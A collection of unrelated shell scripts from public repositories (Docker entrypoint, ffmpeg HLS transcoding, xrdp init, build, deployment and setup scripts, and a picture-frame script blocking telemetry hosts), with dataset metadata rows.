a970edf6edeae56ce81dd503464037bca6574d9f | Shell | codacy-badger/yals | /docker-entrypoint.sh | UTF-8 | 1,001 | 3.703125 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# usage: file_env VAR [DEFAULT]
# ie: file_env 'XYZ_DB_PASSWORD' 'example'
# (will allow for "$XYZ_DB_PASSWORD_FILE" to fill in the value of
# "$XYZ_DB_PASSWORD" from a file, especially for Docker's secrets feature)
file_env() {
local var="$1"
local fileVar="${var}_FILE"
local def="${2:-}"
if [ "${!var:-}" ] && [ "${!fileVar:-}" ]; then
echo >&2 "error: both $var and $fileVar are set (but are exclusive)"
exit 1
fi
local val="$def"
if [ "${!var:-}" ]; then
val="${!var}"
elif [ "${!fileVar:-}" ]; then
val="$(<"${!fileVar}")"
fi
export "$var"="$val"
unset "$fileVar"
}
file_env 'YALS_DB_PASSWORD'
file_env 'TELEGRAM_TOKEN'
# For DB checker
file_env 'DB_HOST' 'yals_db'
file_env 'DB_PORT' '3306'
# DB checker
echo "Connecting to $DB_HOST:$DB_PORT"
while ! nc -z $DB_HOST $DB_PORT; do
echo "Waiting for DB..."
sleep 1
done
echo "Connected! Here we go: "
exec java $JAVA_OPTS -Djava.security.egd=file:/dev/./urandom -jar /app/yals.jar
| true |
54bd9f20151558822dcdeb84aa8478e888172213 | Shell | chaoswest-tv/nginx-hls-origin-docker | /bin/hls.sh | UTF-8 | 2,204 | 2.84375 | 3 | [
"CC-BY-4.0",
"MIT"
] | permissive | #!/bin/sh
set -eux
NAME=${1}
PROBE=$(ffprobe -v quiet -print_format json -show_format -show_streams "rtmp://localhost:1935/live/${NAME}")
#VIDEO_JSON=$(echo ${PROBE} | jq '.streams[] | select(.codec_type == "video")')
VIDEO_DISPLAYHEIGHT=$(echo ${PROBE} | jq -r '.format.tags.displayHeight')
LIBX264_PRESET="-preset faster"
LIBX264_PROFILE="-profile:v main"
GOP_LENGTH="-g 30"
FFMPEG_VARIANTS=""
if [[ "$VIDEO_DISPLAYHEIGHT" -ge 2160 ]]
then
FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 256k -c:v libx264 -b:v 15000k -f flv ${GOP_LENGTH} -vf scale=-2:2160 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_2160p15256kbs"
fi
if [[ "$VIDEO_DISPLAYHEIGHT" -ge 1080 ]]
then
FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 160k -c:v libx264 -b:v 6000k -f flv ${GOP_LENGTH} -vf scale=-2:1080 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_1080p6160kbs"
fi
if [[ "$VIDEO_DISPLAYHEIGHT" -ge 720 ]]
then
FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 160k -c:v libx264 -b:v 3000k -f flv ${GOP_LENGTH} -vf scale=-2:720 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_720p3160kbs"
fi
if [[ "$VIDEO_DISPLAYHEIGHT" -ge 480 ]]
then
FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 128k -c:v libx264 -b:v 1500k -f flv ${GOP_LENGTH} -vf scale=-2:480 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_480p1628kbs"
fi
if [[ "$VIDEO_DISPLAYHEIGHT" -ge 360 ]]
then
FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 128k -c:v libx264 -b:v 800k -f flv ${GOP_LENGTH} -vf scale=-2:360 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_360p928kbs"
fi
FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 96k -c:v libx264 -b:v 500k -f flv ${GOP_LENGTH} -vf scale=-2:240 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_240p596kbs"
FFMPEG_VARIANTS="${FFMPEG_VARIANTS} -c:a aac -b:a 64k -c:v libx264 -b:v 300k -f flv ${GOP_LENGTH} -vf scale=-2:160 ${LIBX264_PRESET} ${LIBX264_PROFILE} rtmp://localhost:1935/hls/${NAME}_160p364kbs"
exec ffmpeg -v info -nostats -y -i "rtmp://localhost:1935/live/${NAME}" ${FFMPEG_VARIANTS} -vf fps=1 -update 1 "/opt/data/hls/${NAME}.png"
| true |
effd7127715d17619ec08b89692303cc1978566f | Shell | juskoa/trigger | /v/vme/pydim/simple/buildso.sh | UTF-8 | 576 | 3.140625 | 3 | [] | no_license | #!/bin/bash
nam=$1
if [ "$nam" = '' ] ;then
cat - <<-EOF
Usage: ./buildso.sh extension_name
using: clientpy...
EOF
nam='clientpy'
fi
# create $nam_wrap.c, $nam.py:
swig -python $nam.i
if [ $? -ne 0 ] ;then
echo "swig rc:$?"
exit
fi
# create $nam_wrap.o
gcc -fPIC -c $nam.c ${nam}_wrap.c -I/usr/include/python2.3 \
-I/opt/dim/dim
# create _$nam.so
#ld -shared --export-dynamic -rpath /opt/dim/linux $nam.o ${nam}_wrap.o -o _$nam.so
#ld -shared $nam.o ${nam}_wrap.o -o _$nam.so
ld -shared --export-dynamic $nam.o ${nam}_wrap.o /opt/dim/linux/libdim.so -o _$nam.so
| true |
f587816ab813fef29a2993579ad0475aa53d1f35 | Shell | rcarmo/ubuntu-xrdp | /xrdp/debian/xrdp.init | UTF-8 | 7,339 | 3.609375 | 4 | [
"MIT-open-group",
"LicenseRef-scancode-warranty-disclaimer",
"FSFAP",
"HPND-sell-variant",
"LicenseRef-scancode-mit-old-style",
"MirOS",
"BSD-2-Clause-Views",
"Bitstream-Vera",
"MIT",
"LicenseRef-scancode-other-permissive",
"X11",
"GPL-2.0-or-later",
"FSFULLR",
"HPND",
"GPL-3.0-only",
"GPL-2.0-only",
"Apache-2.0",
"Autoconf-exception-macro",
"LicenseRef-scancode-unknown",
"GPL-3.0-or-later",
"LicenseRef-scancode-proprietary-license"
] | permissive | #!/bin/sh
### BEGIN INIT INFO
# Provides: xrdp
# Required-Start: $remote_fs $syslog $network
# Required-Stop: $remote_fs $syslog $network
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: xrdp (X Remote Desktop Protocol) full server
# Description: The xrdp daemon uses the Remote Desktop Protocol
# to present a graphical login to a remote client,
# allowing connections to an xorgxrdp or VNC server
# or another RDP server. The xrdp-sesman daemon
# authenticates the users against PAM and starts
# the session and, if necessary, X11 server.
### END INIT INFO
#-
# Copyright © 2015 mirabilos <thorsten.glaser@teckids.org>
# Published under The MirOS Licence.
# absolute basics
LC_ALL=C PATH=/sbin:/usr/sbin:/bin:/usr/bin
export LC_ALL PATH
unset LANGUAGE
# exit cleanly if disabled or not installed
test -x /usr/sbin/xrdp || exit 0
# Debian/LSB init script foobar
DESC='Remote Desktop Protocol server'
NAME=xrdp
. /lib/init/vars.sh
test -t 0 && VERBOSE=yes
. /lib/lsb/init-functions
# read options
SESMAN_START=yes
SESMAN_OPTIONS=
XRDP_OPTIONS=
test -r /etc/default/xrdp && . /etc/default/xrdp
# prepare for actions
case $1 in
(status)
# nothing to do here
;;
(start|stop|force-reload|restart|try-restart)
# check for root; create run-time directories
. /usr/share/xrdp/socksetup
;;
(*)
# syntax error
echo >&2 "Usage: $0 {start|stop|status|restart|try-restart|force-reload}"
exit 3
;;
esac
# take action
rv=0
case $1 in
(start)
test x"$VERBOSE" = x"no" || log_daemon_msg "Starting $DESC"
test x"$SESMAN_START" = x"yes" && \
if start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--startas /usr/sbin/xrdp-sesman --name xrdp-sesman \
--exec /usr/sbin/xrdp-sesman --test; then
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp-sesman"
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--startas /usr/sbin/xrdp-sesman --name xrdp-sesman \
--exec /usr/sbin/xrdp-sesman -- $SESMAN_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
else
test x"$VERBOSE" = x"no" || \
log_progress_msg "sesman already running"
fi
if start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp.pid \
--chuid xrdp:xrdp \
--startas /usr/sbin/xrdp --name xrdp \
--exec /usr/sbin/xrdp --test; then
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp"
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp.pid \
--chuid xrdp:xrdp \
--startas /usr/sbin/xrdp --name xrdp \
--exec /usr/sbin/xrdp -- $XRDP_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
else
test x"$VERBOSE" = x"no" || \
log_progress_msg "xrdp already running"
fi
test x"$VERBOSE" = x"no" || log_end_msg $rv
;;
(stop)
test x"$VERBOSE" = x"no" || log_daemon_msg "Stopping $DESC"
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp.pid \
--name xrdp --exec /usr/sbin/xrdp
rc=$?
if test $rc -gt 1; then
rv=$rc
else
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp
rc=$?
test $rc -gt 1 && test $rv -lt $rc && rv=$rc
fi
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp-sesman"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--name xrdp-sesman --exec /usr/sbin/xrdp-sesman
rc=$?
if test $rc -gt 1; then
rv=$rc
else
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp-sesman
rc=$?
test $rc -gt 1 && test $rv -lt $rc && rv=$rc
fi
rm -f /var/run/xrdp/xrdp-sesman.pid /var/run/xrdp/xrdp.pid
rm -rf /var/run/xrdp/sockdir
test x"$VERBOSE" = x"no" || log_end_msg $rv
;;
(status)
if test x"$SESMAN_START" = x"yes"; then
status_of_proc -p /var/run/xrdp/xrdp-sesman.pid \
/usr/sbin/xrdp-sesman xrdp-sesman
rc=$?
test $rc -gt $rv && rv=$rc
fi
status_of_proc -p /var/run/xrdp/xrdp.pid /usr/sbin/xrdp xrdp
rc=$?
test $rc -gt $rv && rv=$rc
exit $rv
;;
(force-reload|restart)
test x"$VERBOSE" = x"no" || log_daemon_msg "Restarting $DESC"
if test x"$SESMAN_START" = x"yes"; then
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp-sesman"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--name xrdp-sesman --exec /usr/sbin/xrdp-sesman
if test $? -lt 2; then
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp-sesman
fi
rm -f /var/run/xrdp/xrdp-sesman.pid
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--startas /usr/sbin/xrdp-sesman --name xrdp-sesman \
--exec /usr/sbin/xrdp-sesman -- $SESMAN_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
fi
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp.pid \
--name xrdp --exec /usr/sbin/xrdp
if test $? -lt 2; then
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp
fi
rm -f /var/run/xrdp/xrdp.pid
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp.pid \
--chuid xrdp:xrdp \
--startas /usr/sbin/xrdp --name xrdp \
--exec /usr/sbin/xrdp -- $XRDP_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
test x"$VERBOSE" = x"no" || log_end_msg $rv
;;
(try-restart)
test x"$VERBOSE" = x"no" || log_daemon_msg "Trying to restart $DESC"
if ! status_of_proc -p /var/run/xrdp/xrdp.pid \
/usr/sbin/xrdp xrdp >/dev/null 2>&1; then
test x"$VERBOSE" = x"no" || log_progress_msg "is not running."
test x"$VERBOSE" = x"no" || log_end_msg 1
exit 0
fi
if status_of_proc -p /var/run/xrdp/xrdp-sesman.pid \
/usr/sbin/xrdp-sesman xrdp-sesman >/dev/null 2>&1; then
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp-sesman"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--name xrdp-sesman --exec /usr/sbin/xrdp-sesman
if test $? -lt 2; then
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp-sesman
fi
rm -f /var/run/xrdp/xrdp-sesman.pid
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp-sesman.pid \
--startas /usr/sbin/xrdp-sesman --name xrdp-sesman \
--exec /usr/sbin/xrdp-sesman -- $SESMAN_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
fi
test x"$VERBOSE" = x"no" || log_progress_msg "xrdp"
start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
--pidfile /var/run/xrdp/xrdp.pid \
--name xrdp --exec /usr/sbin/xrdp
if test $? -lt 2; then
start-stop-daemon --stop --quiet --oknodo \
--retry=0/30/KILL/5 --exec /usr/sbin/xrdp
fi
rm -f /var/run/xrdp/xrdp.pid
start-stop-daemon --start --quiet \
--pidfile /var/run/xrdp/xrdp.pid \
--chuid xrdp:xrdp \
--startas /usr/sbin/xrdp --name xrdp \
--exec /usr/sbin/xrdp -- $XRDP_OPTIONS
rc=$?
test $rc -gt 0 && rv=$rc
test x"$VERBOSE" = x"no" || log_end_msg $rv
;;
esac
# make “/etc/init.d/xrdp status” work for nōn-root
(sleep 3; chmod a+r /var/run/xrdp/*.pid 2>/dev/null) &
exit $rv
| true |
d15e0dafcccfe85c768b72c5aa328ed222b0b165 | Shell | PhilipMassey/bash-scripts | /dir-list.sh | UTF-8 | 526 | 3.75 | 4 | [] | no_license | #!/bin/bash
SAVEIFS=$IFS
IFS=$(echo -en "\n\b")
START=.
# change your directory to command line if passed
# otherwise use home directory
[ $# -eq 1 ] && START=$1 || :
if [ ! -d $START ]
then
echo "$START not a directory!"
exit 1
fi
# use find command to get all subdirs name in DIRS variable
dirs=$(find $START -type d | grep -v '^./.*/.*/')
# loop thought each dir to get the number of files in each of subdir
for adir in dirs
do
echo "${adir}" >> dir-list.log
done
IFS=$SAVEIFS
| true |
95722af4dd58010700e7fe14cf24462a9e47e894 | Shell | TLLSAIFUL/storage | /contrib/cirrus/build_and_test.sh | UTF-8 | 1,053 | 2.640625 | 3 | [
"MIT",
"Apache-2.0"
] | permissive | #!/bin/bash
set -e
source $(dirname $0)/lib.sh
cd $GOSRC
make install.tools
showrun make local-binary
showrun make local-cross
showrun make local-test-unit
# TODO: Some integration tests fail on Fedora
if [[ "$OS_RELEASE_ID" != "fedora" ]]; then
showrun make STORAGE_DRIVER=overlay local-test-integration
fi
showrun make STORAGE_DRIVER=overlay STORAGE_OPTION=overlay.mount_program=/usr/bin/fuse-overlayfs local-test-integration
showrun make STORAGE_DRIVER=overlay FUSE_OVERLAYFS_DISABLE_OVL_WHITEOUT=1 STORAGE_OPTION=overlay.mount_program=/usr/bin/fuse-overlayfs local-test-integration
showrun make STORAGE_DRIVER=vfs local-test-integration
if [[ "$OS_RELEASE_ID" == "ubuntu" ]]; then
showrun make STORAGE_DRIVER=aufs local-test-integration
fi
# TODO: Requires partitioning of $(cat /root/second_partition_ready) device after running
# https://github.com/containers/libpod/blob/v1.6.2/contrib/cirrus/add_second_partition.sh
#
#showrun make STORAGE_DRIVER=devicemapper STORAGE_OPTION=dm.directlvm_device=/dev/abc local-test-integration
| true |
060e1621a2c497c9ed5bab97ef4693f3d9d0c5a3 | Shell | timausk/dotfiles | /scripts/linux/setup.sh | UTF-8 | 916 | 2.90625 | 3 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/bash
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# brew.sh
#
# setup a new LINUX machine
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
cd "$(dirname "${BASH_SOURCE[0]}")" && . "../helper.sh"
# setup SSH
# i downloaded and copied files, but guess we should gen a new pair
# copy downloaded files
# cp ~/Downloads/id_rsa.pub ~/.ssh/
# correct permission
# sudo chmod 600 ~/.ssh/id_rsa
# update packagelist upfront
sudo apt update;
# - - - - - - - - - - - - - - - - - - - - - - - - -
# installing packages
./packages.sh
# - - - - - - - - - - - - - - - - - - - - - - - - -
# installing oh-my-zsh
./../common/oh_my_zsh.sh
# - - - - - - - - - - - - - - - - - - - - - - - - -
# installing Node Version Manager
./../common/nvm.sh
# - - - - - - - - - - - - - - - - - - - - - - - - -
# installing sdkman
./../common/sdkman.sh
| true |
67ab48b79c2963fd35bc12f3edd9a2c354a76999 | Shell | ErasmusMC-Bioinformatics/shm_csr | /change_o/makedb.sh | UTF-8 | 529 | 3.1875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
dir="$(cd "$(dirname "$0")" && pwd)"
input=$1
noparse=$2
scores=$3
regions=$4
output=$5
if [ "true" == "$noparse" ] ; then
noparse="--noparse"
else
noparse=""
fi
if [ "true" == "$scores" ] ; then
scores="--scores"
else
scores=""
fi
if [ "true" == "$regions" ] ; then
regions="--regions"
else
regions=""
fi
mkdir $PWD/outdir
echo "makedb: $PWD/outdir"
MakeDb.py imgt -i $input --outdir $PWD/outdir --outname output $noparse $scores $regions
mv $PWD/outdir/output_db-pass.tab $output
rm -rf $PWD/outdir/
| true |
6e646df8dbf165ddfc9308b61b82799f801d3dbf | Shell | elmoremh/HD1-HD2-natural-history | /echo_filenames_cat_headers.sh | UTF-8 | 132 | 3.03125 | 3 | [] | no_license | #!/bin/bash
### for each fasta file in directory, echo name of file and cat contents
for fa in *.fasta; do
echo $fa
cat $fa
done | true |
f8b97010459a7e45dffe6015cfc93d6b3360a346 | Shell | kasperski95/bank-system | /Main/Home/Transactions/view.sh | UTF-8 | 726 | 3.546875 | 4 | [] | no_license | #!/bin/bash
tnst_title="TRANSAKCJE"
tnst_dir="${BASH_SOURCE%/*}"
if [[ ! -d "$tnst_dir" ]]; then tnst_dir="$PWD"; fi
. $tnst_dir/controller.sh
tnst_show() {
local action
ui_header "$home_title" "$tnst_title"
__tnst_showMenu && echo ""
ui_line
read -p "Wybierz akcję: " action
__tnst_handleAction $action
return 0
}
__tnst_showMenu() {
echo "1 - Przelew zwykły"
echo "2 - Przelew ekspress"
echo "3 - Przelew walutowy"
echo "0 - Powrót"
return 0
}
__tnst_handleAction() {
case $1 in
"1") tnst_handleTransfer;;
"2") tnst_handleExpressTransfer;;
"3") tnst_handleMonetaryTransfer;;
*) home_skipPause=true
esac
return 0
} | true |
db736c3ef50761e087db2c1110513fb7502b5b9c | Shell | t-hiro23/control_repository | /create/fork_into_user.sh | SHIFT_JIS | 476 | 3.4375 | 3 | [] | no_license | #!/bin/bash
# usage
if test $# -ne 4; then
echo "usage: ${0} <user> <pass> <fork_target_rep_owner> <fork_target_rep>"
exit 0
fi
#ʐݒǂݍ
TOOL_ROOT_DIR=`which ${0}`
. ${TOOL_ROOT_DIR%/*/*}/.setting/setting.sh
# {ݒ
GITHUB_USER=${1:?}
GITHUB_PASS=${2:?}
# userfork
GITHUB_SRC_REP_OWNER="${3:?}"
GITHUB_SRC_REP="${4:?}"
curl -u "${GITHUB_USER}:${GITHUB_PASS}" -X POST ${GITHUB_API}/repos/${GITHUB_SRC_REP_OWNER}/${GITHUB_SRC_REP}/forks
| true |
5a778bb9c4395d4336c4e54ca307945e7fcaa8c0 | Shell | you-li-nu/IC3ref | /aiger/configure | UTF-8 | 1,587 | 3.953125 | 4 | [
"BSD-3-Clause",
"MIT"
] | permissive | #!/bin/sh
debug=no
die () {
echo "*** configure: $*" 1>&2
exit 1
}
usage () {
echo "usage: [CC=compile] [CFLAGS=cflags] configure [-h][-hg]"
exit 0
}
warning () {
echo "[configure] warning: $*" 1>& 2
}
message () {
echo "[configure] $*" 1>& 2
}
while [ $# -gt 0 ]
do
case $1 in
-h|--help) usage;;
-g) debug=yes;;
*) die "invalid command line option '$1' (try '-h')";;
esac
shift
done
if [ x"$CC" = x ]
then
message "using gcc as default compiler"
CC=gcc
else
message "using $CC as compiler"
fi
if [ x"$CFLAGS" = x ]
then
message "using default compilation flags"
case x"$CC" in
xgcc*)
CFLAGS="-Wall"
if [ $debug = yes ]
then
CFLAGS="-g"
else
CFLAGS="-O3 -DNDEBUG"
fi
;;
*)
if [ $debug = yes ]
then
CFLAGS="-g"
else
CFLAGS="-O -DNDEBUG"
fi
;;
esac
else
message "using custom compilation flags"
fi
if [ -d ../picosat ]
then
if [ -f ../picosat/picosat.h ]
then
if [ -f ../picosat/picosat.o ]
then
AIGBMCTARGET="aigbmc"
message "using 'picosat.h' and 'picosat.o' in '../picosat/' for 'aigbmc'"
else
warning \
"can not find '../picosat/picosat.o' object file (no 'aigbmc' target)"
fi
else
warning "can not find '../picosat/picosat.h' header (no 'aigbmc' target)"
fi
else
warning "can not find '../picosat' directory (no 'aigbmc' target)"
fi
message "compiling with: $CC $CFLAGS"
rm -f makefile
sed \
-e "s/@CC@/$CC/" \
-e "s/@CFLAGS@/$CFLAGS/" \
-e "s/@AIGBMCTARGET@/$AIGBMCTARGET/" \
makefile.in > makefile
| true |
46771d2c7708b728e5217a7b8994746c6176f2cb | Shell | kirisky/EnvScripts | /installationOnFedora_whiptail.sh | UTF-8 | 2,094 | 3.921875 | 4 | [] | no_license | #/bin/sh
############################# initializing global variables ############################################################
#
# Set a path for shell config file
#
shellConfigFile=~/.zshrc
#
# Fetch paths for change the directory
#
currentPath=`pwd`
basePath="./fedora"
# string for DOCKER_HOST
dockerHostString="export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock"
#
# Aquire scripts
#
scripts=($(ls $basePath | grep "\.sh"))
#
# Aquire current user's bin folder
#
userBinFolder=~/bin
#
# Path for zsh shell
#
zshShellPath="/usr/bin/zsh"
#
# Path for oh-my-zsh
#
ohMyZshFolderPath=~/.oh-my-zsh
############################# loading requirements #######################################################################
#
# load shell colors
#
source ./common/16Color
############################# checking if zsh and oh-my-zsh has been installed on this machine #########################
source ./common/zsh_omz_installation
check_zsh_and_omz
############################# Launch Whiptail Dialog #######################################################################
#
# Launch whiptail diglog and get selected options
#
# Reference
# https://saveriomiroddi.github.io/Shell-scripting-adventures-part-3/#check-list
#
if [ ! -f "/usr/bin/whiptail" ]; then
echo "Whiptail does not exist on this machine. Will install it on this machine."
sudo dnf -y install newt
fi
title='Fedora Dev-Env Installation'
message='What apps do you want to install?'
scriptIndex=1
whiptailString=""
for element in ${scripts[@]}
do
whiptailString+="$scriptIndex $element OFF "
scriptIndex=$[$scriptIndex + 1]
done
selected_options=($(whiptail --separate-output --title "$title" --checklist "$message" 20 36 10 $whiptailString 3>&1 1>&2 2>&3))
tempArray=()
for i in ${!selected_options[@]}
do
tempArray+=(${scripts[ ${selected_options[i]}-1 ]})
done
scripts=(${tempArray[@]})
############################# executing logic ##########################################################################
#
# Execute the scripts by the executor file
#
source ./common/executor
| true |
0f545ca8db90e4f14f0378660ff19d6b8a9e1d42 | Shell | radiobuddha/do_vagrantfile_rb | /bootstrap.sh | UTF-8 | 1,354 | 3.484375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bash
#to start new server: vagrant up --provider=digital_ocean
#to run bootstrap.sh: vagrant reload --provision
FILE=".initial_vagrant_setup.lock"
if [ -f $FILE ];
then
echo "Software already installed."
else
echo "Installing Radio Buddha's software ..."
echo "Updating system ..."
apt-get update
echo "Upgrading system ..."
apt-get -y upgrade
echo "Installing lame, mpd, mpc ncmpcpp, git ..."
apt-get -y install lame
apt-get -y install mpd
apt-get -y install mpc
apt-get -y install ncmpcpp
apt-get -y install git
echo "Writing initial setup lockfile"
touch $FILE
echo "Rebooting system ..."
reboot now
fi
RB_GIT_DIR="radio_buddha_mpd_confs"
if [ -d $RB_GIT_DIR ];
then
echo "Updating $RB_GIT_DIR"
cd radio_buddha_mpd_confs
git pull
cd ..
else
echo "Cloning $RB_GIT_DIR"
git clone https://github.com/kylepjohnson/radio_buddha_mpd_confs.git
fi
echo "Copying playlist and mpd.conf ..."
cp -rf radio_buddha_mpd_confs/playlists/* /var/lib/mpd/playlists
cp -f radio_buddha_mpd_confs/mpd.conf /etc/mpd.conf
#transfer audio ex
#rsync -avz root@192.241.186.239:/var/lib/mpd/music/* /var/lib/mpd/music
echo "Restarting MPD ..."
service mpd restart
echo "Starting playlist ..."
cd /var/lib/mpd/playlists
mpc load master.m3u
mpc repeat on
mpc play
cd /root
| true |
87d6a6a9404daa4b81b85d638dc47780d5964245 | Shell | dacandia/Exercise08LinuxShell | /script.sh | UTF-8 | 802 | 3.59375 | 4 | [] | no_license | #!/bin/bash
# Given three integers (X, Y, and Z) representing the three sides of a triangle,
# identify whether the triangle is Scalene, Isosceles, or Equilateral.
echo "Input first side: "
read sideOne
echo "Input second side: "
read sideTwo
echo "Input third side: "
read sideThree
sumA="$(($sideOne+$sideTwo))"
sumB="$(($sideTwo+$sideThree))"
sumC="$(($sideThree+$sideOne))"
if [ "$sumA" -lt "$sideThree" ] || [ "$sumB" -lt "$sideOne" ] || [ "$sumC" -lt "$sideTwo" ]; then
echo "It's not a Triangle"
else
if [ "$sideOne" -eq "$sideTwo" ] && [ "$sideTwo" -eq "$sideThree" ]; then
echo "EQUILATERAL"
elif [ "$sideOne" -eq "$sideTwo" ] || [ "$sideTwo" -eq "$sideThree" ] || [ "$sideThree" -eq "$sideOne" ]; then
echo "ISOSCELES"
else
echo "SCALENE"
fi
fi
| true |
3f070b5871707196f41576366500735fd6cc097c | Shell | xiangys0134/deploy | /jenkins/rpm包自动打包/xone/scada-task-update.sh | UTF-8 | 2,170 | 3.65625 | 4 | [] | no_license | #!/bin/bash
# yousong.xiang 250919938@qq.com
# 2019.5.10
# v1.0.1
# scada-task包更新脚本
[ -f /etc/profile ] && . /etc/profile
base_dir=`pwd`
path_dir=/data/code
web_site_dir=/data
host_user=root
function server_stop() {
task_pid=`ps -ef|grep scada-task |egrep -v "grep|$0|scada-task-update"|awk '{print $2}'`
if [ -z "${task_id}" ]; then
echo "SERVER is stoping"
return 2
fi
sudo kill -9 ${task_pid}
}
function server_start() {
task_pid=`ps -ef|grep scada-task |egrep -v "grep|$0|scada-task-update"|awk '{print $2}'`
if [ -n "${task_pid}" ]; then
echo "SERVER is running"
return 0
else
sudo ${web_site_dir}/scada-task/bin/run.sh start
echo "SERVER is starting"
return 0
fi
}
function scada_update() {
#source_pkg=$1
cd /tmp/${JOB_NAME}_tmp
tar_name=`ls *tar.gz 2>/dev/null |awk '{print $0}'`
if [ -z "${tar_name}" ]; then
echo "更新包获取失败"
exit 4
fi
version=${tar_name%%.tar.gz}
#echo "${version}"
#tar -zxvf scada-task.15.tar.gz -C /tmp/aaa
sudo tar -zxf ${tar_name} -C ${path_dir}
if [ $? -ne 0 ]; then
echo "Decompress failed"
exit 3
fi
#copy config file
if [ -d ${web_site_dir}/scada-task/config ]; then
sudo /bin/cp -rf ${web_site_dir}/scada-task/config ${path_dir}/${version}/
if [ $? -ne 0 ]; then
echo "configs copy failed"
exit 7
fi
else
echo "请修改相关配置文件,路径:${web_site_dir}/scada-task/config"
fi
cd ${web_site_dir}
[ -L scada-task -o -f scada-task ] && sudo rm -rf scada-task
sudo ln -s ${path_dir}/${version} scada-task
if [ $? -ne 0 ]; then
echo "link failed"
exit 4
fi
sudo mkdir -p ${web_site_dir}/scada-task/logs/scada-task
echo "sudo chown -R ${host_user}. ${path_dir}/${version}"
sudo chown -R ${host_user}. ${path_dir}/${version}
echo "sudo chown -R ${host_user}. ${web_site_dir}/scada-task"
sudo chown -R ${host_user}. ${web_site_dir}/scada-task
echo "部署完成"
}
server_stop
scada_update
server_start
| true |
fee97b3ddbcc44ec73b5f04df1d554dcc9667890 | Shell | INT3hex/PictureFrameMod | /files/loop.sh | UTF-8 | 5,548 | 2.59375 | 3 | [] | no_license | #!/system/bin/sh
echo "start"
LOGFILE=/sdcard/FamilyAlbum/local/log.txt
IMAGEDIR=/sdcard/FamilyAlbum/local
MUTEX=/mnt/obb/loop.run
# URL to pictures
URL=http://192.168.178.200/cpf8a1/
SCRIPT=clear.sh
CONFIG=config.txt
echo "$(date) " >> $LOGFILE
echo "$(date) [$BASHPID] starting /data/user/hack/loop.sh" >> $LOGFILE
# Mutexsection
if [ -f "$MUTEX" ];
then
echo "Mutex $MUTEX is found, loop already running"
echo "$(date) Mutex $MUTEX is found, loop already running - exit this!" >> $LOGFILE
exit
else
echo "Mutex $MUTEX is not found"
echo "$(date) Mutex $MUTEX is not found, start loop" >> $LOGFILE
fi
echo "Running Main! Mutex BASHPID: $BASHPID" > $MUTEX
# block network communication
# check with: ip route oder /data/user/hack/busybox-armv7lv1_31 route
/data/user/hack/busybox-armv7lv1_31 route add -host 52.41.236.57 reject
/data/user/hack/busybox-armv7lv1_31 route add -host 8.211.36.31 reject
/data/user/hack/busybox-armv7lv1_31 route add -host umeng.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host alog-g.umeng.com reject
/data/user/hack/busybox-armv7lv1_31 route add -host oc.umeng.com.gds.alibabadns.com reject
